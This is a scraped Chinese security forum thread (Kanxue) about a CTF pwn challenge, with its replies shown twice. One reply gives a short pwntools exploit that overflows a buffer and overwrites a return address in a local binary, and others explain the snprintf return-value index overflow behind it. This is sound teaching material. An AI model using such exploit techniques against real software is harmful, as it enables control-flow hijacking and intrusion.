[求助]一道pwn题，求帮忙~~-Pwn-看雪安全社区｜专业技术交流与安全研究论坛

最新回复 (3)
mb_lfqwsomb 雪币： 201 能力值： ( LV1，RANK：0 ) 在线值：发帖 0 回帖 3 粉丝 0 关注私信	mb_lfqwsomb 2 楼 from pwn import* p=process('./sp') payload=b'a'*(0x118-11-4) p.send(payload) payload=p64(0x4012A2) #gdb.attach(p) #pause() p.send(payload) p.interactive() snprintf返回值考察问题导致的索引溢出 2026-3-11 14:22 0
mb_lfqwsomb 雪币： 201 能力值： ( LV1，RANK：0 ) 在线值：发帖 0 回帖 3 粉丝 0 关注私信	mb_lfqwsomb 3 楼不错啊这题，考察动态调试，我拿去给我们新生练习了 2026-3-11 14:22 0
mb_dxsbxhbd 雪币： 229 能力值： ( LV1，RANK：0 ) 在线值：发帖 2 回帖 1 粉丝 0 关注私信	mb_dxsbxhbd 4 楼懂了懂了，snprintf的返回值不以限定的长度为准，而是以实际输入的长度为准，返回值可能大于限定的长度，从而第二次snprintf的索引直接到[rbp+8]，学到了，谢谢大佬最后于 2026-3-11 21:52 被mb_dxsbxhbd编辑，原因： 2026-3-11 21:51 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

最新回复 (3)
mb_lfqwsomb 雪币： 201 能力值： ( LV1，RANK：0 ) 在线值：发帖 0 回帖 3 粉丝 0 关注私信	mb_lfqwsomb 2 楼 from pwn import* p=process('./sp') payload=b'a'*(0x118-11-4) p.send(payload) payload=p64(0x4012A2) #gdb.attach(p) #pause() p.send(payload) p.interactive() snprintf返回值考察问题导致的索引溢出 2026-3-11 14:22 0
mb_lfqwsomb 雪币： 201 能力值： ( LV1，RANK：0 ) 在线值：发帖 0 回帖 3 粉丝 0 关注私信	mb_lfqwsomb 3 楼不错啊这题，考察动态调试，我拿去给我们新生练习了 2026-3-11 14:22 0
mb_dxsbxhbd 雪币： 229 能力值： ( LV1，RANK：0 ) 在线值：发帖 2 回帖 1 粉丝 0 关注私信	mb_dxsbxhbd 4 楼懂了懂了，snprintf的返回值不以限定的长度为准，而是以实际输入的长度为准，返回值可能大于限定的长度，从而第二次snprintf的索引直接到[rbp+8]，学到了，谢谢大佬最后于 2026-3-11 21:52 被mb_dxsbxhbd编辑，原因： 2026-3-11 21:51 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复